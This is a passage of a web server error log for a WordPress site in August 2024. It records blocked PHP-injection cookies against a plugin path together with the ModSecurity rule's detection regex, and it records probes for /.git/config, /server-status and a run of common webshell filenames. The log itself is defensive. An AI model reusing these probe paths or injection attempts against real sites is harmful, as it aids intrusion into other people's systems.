www.google.com [Tue Aug 20 17:02:41.777671 2024] [:error] [pid 20536:tid 139938867660544] [client 144.126.136.157:47146] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsUSgV8tBPer3JkbIZLM1gAAAFI"], referer: www.google.com [Wed Aug 21 04:05:51.737963 2024] [:error] [pid 9289:tid 140016797837056] [client 144.126.136.157:59974] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsWt73rl1grIXLvDSlXx6QAAAMw"], referer: www.google.com [Wed Aug 21 04:06:03.721695 2024] [:error] [pid 9289:tid 140016848193280] [client 144.126.136.157:59982] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsWt-3rl1grIXLvDSlXx6gAAAMY"], referer: www.google.com [Wed Aug 21 10:45:17.491267 2024] [autoindex:error] [pid 8545:tid 140016864978688] [client 20.204.154.50:37400] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 21 13:19:18.024691 2024] [:error] [pid 8545:tid 140016755873536] [client 144.126.136.157:41026] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsYvppe7zI41-8bKg8gKbwAAAJE"], referer: www.google.com [Wed Aug 21 13:19:27.508377 2024] [:error] [pid 9289:tid 140016839800576] [client 144.126.136.157:41028] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsYvr3rl1grIXLvDSlX1UAAAAMc"], referer: www.google.com [Wed Aug 21 16:25:05.102666 2024] [autoindex:error] [pid 9289:tid 140016713910016] [client 195.3.223.154:43490] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 22 11:37:14.807960 2024] [authz_core:error] [pid 13722:tid 139657295685376] [client 96.126.110.181:33508] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/22 11:37:18 [error] 13682#13682: *22618 access forbidden by rule, client: 96.126.110.181, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 22 11:55:55.986199 2024] [authz_core:error] [pid 13724:tid 139657111045888] [client 68.183.9.16:33824] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/22 11:56:02 [error] 13682#13682: *22816 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 23 02:35:31.351777 2024] [autoindex:error] [pid 13723:tid 139657236936448] [client 128.199.30.174:56390] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 23 18:40:58.936322 2024] [autoindex:error] [pid 11432:tid 140074377209600] [client 4.213.113.19:48568] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 24 10:50:21.481068 2024] [authz_core:error] [pid 5442:tid 140499469080320] [client 68.183.9.16:36892] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/24 10:50:26 [error] 5321#5321: *56946 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/24 12:49:43 [error] 5320#5320: *58634 access forbidden by rule, client: 45.148.10.142, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Aug 24 13:02:55.771082 2024] [authz_core:error] [pid 5442:tid 140499276998400] [client 46.101.1.225:39830] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/24 13:03:01 [error] 5321#5321: *58748 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 25 04:24:41.289985 2024] [autoindex:error] [pid 2188:tid 140626666374912] [client 159.89.166.137:56232] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/08/25 05:42:44 [error] 1019#1019: *70102 access forbidden by rule, client: 195.178.110.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 25 12:27:59.505022 2024] [:error] [pid 1062:tid 140626691553024] [client 62.146.170.0:34836] [client 62.146.170.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zstpn9cfuHDL1LiNtmmjeQAAAJU"], referer: www.google.com [Sun Aug 25 12:28:08.077832 2024] [:error] [pid 1062:tid 140626741909248] [client 62.146.170.0:34838] [client 62.146.170.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZstpqNcfuHDL1LiNtmmjegAAAI8"], referer: www.google.com [Mon Aug 26 08:15:08.606365 2024] [authz_core:error] [pid 5530:tid 140186616768256] [client 159.203.96.42:58526] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/26 08:15:12 [error] 4720#4720: *5798 access forbidden by rule, client: 159.203.96.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Aug 26 10:50:24.116434 2024] [autoindex:error] [pid 5530:tid 140186625160960] [client 74.225.209.150:33192] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 26 11:41:10.417298 2024] [authz_core:error] [pid 16140:tid 140186692302592] [client 167.71.175.236:34260] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/26 11:41:14 [error] 4719#4719: *7977 access forbidden by rule, client: 167.71.175.236, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 26 12:21:53.615990 2024] [autoindex:error] [pid 5530:tid 140186884978432] [client 108.165.243.129:35486] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Mon Aug 26 12:22:10.658476 2024] [:error] [pid 4901:tid 140186725873408] [client 108.165.243.129:35494] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Aug 26 12:22:54.622721 2024] [autoindex:error] [pid 16140:tid 140186616768256] [client 108.165.243.129:35534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Aug 26 12:23:36.358667 2024] [:error] [pid 16140:tid 140186725873408] [client 108.165.243.129:35582] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Aug 26 12:24:11.707740 2024] [autoindex:error] [pid 4901:tid 140186767836928] [client 108.165.243.129:35610] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Mon Aug 26 12:24:14.694666 2024] [autoindex:error] [pid 5530:tid 140186784622336] [client 108.165.243.129:35618] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Mon Aug 26 12:24:28.243461 2024] [autoindex:error] [pid 4903:tid 140186793015040] [client 108.165.243.129:35638] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Mon Aug 26 12:25:58.897447 2024] [autoindex:error] [pid 16140:tid 140186700695296] [client 108.165.243.129:35720] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Aug 26 12:26:22.698071 2024] [:error] [pid 5530:tid 140186625160960] [client 108.165.243.129:35748] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Aug 26 12:27:39.255672 2024] [autoindex:error] [pid 4903:tid 140186717480704] [client 108.165.243.129:35828] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Mon Aug 26 12:27:45.479035 2024] [autoindex:error] [pid 16140:tid 140186658731776] [client 108.165.243.129:35836] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Mon Aug 26 12:28:16.994486 2024] [autoindex:error] [pid 4903:tid 140186650339072] [client 108.165.243.129:35878] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 26 12:35:15.570115 2024] [:error] [pid 5530:tid 140186616768256] [client 108.165.243.129:36356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Mon Aug 26 12:35:31.215690 2024] [autoindex:error] [pid 5530:tid 140186751051520] [client 108.165.243.129:36378] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php 2024/08/26 12:35:32 [error] 4719#4719: *8438 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 108.165.243.129, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Mon Aug 26 12:35:52.573580 2024] [:error] [pid 5530:tid 140186725873408] [client 108.165.243.129:36398] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/worksec.php [Mon Aug 26 12:36:13.256029 2024] [autoindex:error] [pid 16140:tid 140186667124480] [client 108.165.243.129:36420] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Mon Aug 26 12:36:16.164639 2024] [:error] [pid 4903:tid 140186717480704] [client 108.165.243.129:36428] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Aug 26 12:36:50.675240 2024] [autoindex:error] [pid 4901:tid 140186709088000] [client 108.165.243.129:36454] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 26 12:37:03.123662 2024] [autoindex:error] [pid 4901:tid 140186667124480] [client 108.165.243.129:36468] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 26 12:37:07.931759 2024] [autoindex:error] [pid 16140:tid 140186616768256] [client 108.165.243.129:36474] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/img/index.php [Mon Aug 26 12:38:03.309470 2024] [:error] [pid 16140:tid 140186700695296] [client 108.165.243.129:36532] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Mon Aug 26 12:39:25.191948 2024] [autoindex:error] [pid 5530:tid 140186616768256] [client 108.165.243.129:36616] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Mon Aug 26 12:39:57.789994 2024] [:error] [pid 16140:tid 140186675517184] [client 108.165.243.129:36638] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/classwithtostring.php [Mon Aug 26 12:40:10.954897 2024] [:error] [pid 16140:tid 140186709088000] [client 108.165.243.129:36646] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/LA.php [Mon Aug 26 12:40:14.169747 2024] [:error] [pid 16140:tid 140186759444224] [client 108.165.243.129:36648] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Aug 26 12:40:32.822391 2024] [:error] [pid 16140:tid 140186776229632] [client 108.165.243.129:36666] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Mon Aug 26 12:40:34.825661 2024] [:error] [pid 16140:tid 140186667124480] [client 108.165.243.129:36672] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Mon Aug 26 12:41:07.448763 2024] [:error] [pid 16140:tid 140186616768256] [client 108.165.243.129:36716] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Aug 26 12:41:37.346399 2024] [:error] [pid 16140:tid 140186784622336] [client 108.165.243.129:36760] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/alfa.php [Mon Aug 26 12:42:22.585733 2024] [:error] [pid 4901:tid 140186759444224] [client 108.165.243.129:36806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/defaults.php [Mon Aug 26 12:42:33.425833 2024] [:error] [pid 16140:tid 140186709088000] [client 108.165.243.129:36814] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/doc.php [Mon Aug 26 12:42:43.565539 2024] [:error] [pid 4903:tid 140186625160960] [client 108.165.243.129:36828] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Aug 26 12:42:48.489409 2024] [:error] [pid 16140:tid 140186776229632] [client 108.165.243.129:36830] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Mon Aug 26 12:42:56.994182 2024] [:error] [pid 4903:tid 140186759444224] [client 108.165.243.129:36838] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp.php [Mon Aug 26 12:43:05.830045 2024] [:error] [pid 4903:tid 140186709088000] [client 108.165.243.129:36844] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cong.php [Mon Aug 26 12:43:23.087793 2024] [autoindex:error] [pid 4901:tid 140186633553664] [client 108.165.243.129:36864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Aug 26 12:43:29.321987 2024] [autoindex:error] [pid 4903:tid 140186717480704] [client 108.165.243.129:36870] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Mon Aug 26 12:44:04.334373 2024] [autoindex:error] [pid 16140:tid 140186692302592] [client 108.165.243.129:36898] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Mon Aug 26 12:44:11.461478 2024] [:error] [pid 4903:tid 140186675517184] [client 108.165.243.129:36910] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Mon Aug 26 12:44:13.863661 2024] [:error] [pid 16140:tid 140186633553664] [client 108.165.243.129:36912] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless.php [Mon Aug 26 12:44:46.177323 2024] 